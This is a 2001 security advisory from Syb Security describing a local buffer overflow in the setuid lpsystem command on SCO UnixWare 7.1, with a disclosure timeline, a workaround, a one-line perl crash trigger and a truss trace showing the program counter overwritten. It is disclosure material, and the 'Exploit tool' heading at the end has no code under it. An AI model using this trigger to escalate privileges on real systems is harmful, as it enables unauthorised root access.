© Neurowork™ 2010. Todos los derechos reservados.
Syb Security
es una unidad de negocio de Neurowork™ |
Otras unidades de negocio
Acerca de Neurowork™ | Mapa del sitio | Términos de uso | Marcas registradas | Política de privacidad | Comentarios
redlink Buscar
 redlink Seleccione Idioma
print e-mail sitemap
Bookmark and Share

Advisories

SYBSEC-ADV04: SCO UnixWare 7 lpsystem Local Buffer Overflow Exploit

Title
SCO UnixWare 7 lpsystem Local Buffer Overflow Exploit
ID
SYBSEC-ADV04
Severity
HIGH - Local Buffer Overflow
History
04.OCT.2001 Vulnerability discovered
15.OCT.2001 Vendor contacted
Scope
Local Buffer Overflow Vulnerability
Platforms
SCO UnixWare 7.1
Author
URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV04-UnixWare_7_lpsystem_Local_Buffer_Overflow_Exploit
Release
Public
Overview
The lpsystem: Register remote systems with the print service.
Affected versions
The vulnerability has been reported in versions SCO Server
SCO Server Unixware 7.1
Description
The lpsystem command is obsolete, and could be removed at any time. The print system no longer uses the information generated by lpsystem. The local buffer Overflow vulnerability gives an intruder elevated privileges on the system
Workaround
Upgrade the sofware version you can download from:
http://www.sco.com
Acknowledgments
This vulnerability have been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
Local Buffer Overflow:

# ls -la /usr/sbin/lpsystem
---s--x--x 1 root lp 41840 Ap 4 998 /usr/sbin/lpsystem
#
# /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
Segmentation Fault - core dumped
#

* Maped with truss :

# truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`

[...]

read(3, " A A A A A A A A A A A A".., 1032) = 1032
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, " A A A A A A A A A A A A".., 1032) = 1032
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, " A A A A A A A A A A A A".., 1032) = 475
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, 0x0830B740, 1032) = 0
close(3) = 0
write(4, " A A A A A A A A A A A A".., 549) = 549
close(4) = 0
rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
fcntl(3, F_SETLK, 0x07F53C2C) = 0
fcntl(3, F_GETFL, 0x00000009) = 9
lseek64(3, 0, 2) = 1542283
write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
close(3) = 0
lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
close(3) = 0
xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
ioctl(3, I_CANPUT, 0x00000000) = 1
getgid() = 103 [ 103 ]
getuid() = 0 [ 0 ]
Incurred fault #6, FLTBOUNDS %pc = 0x08072410
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***

Exploit tool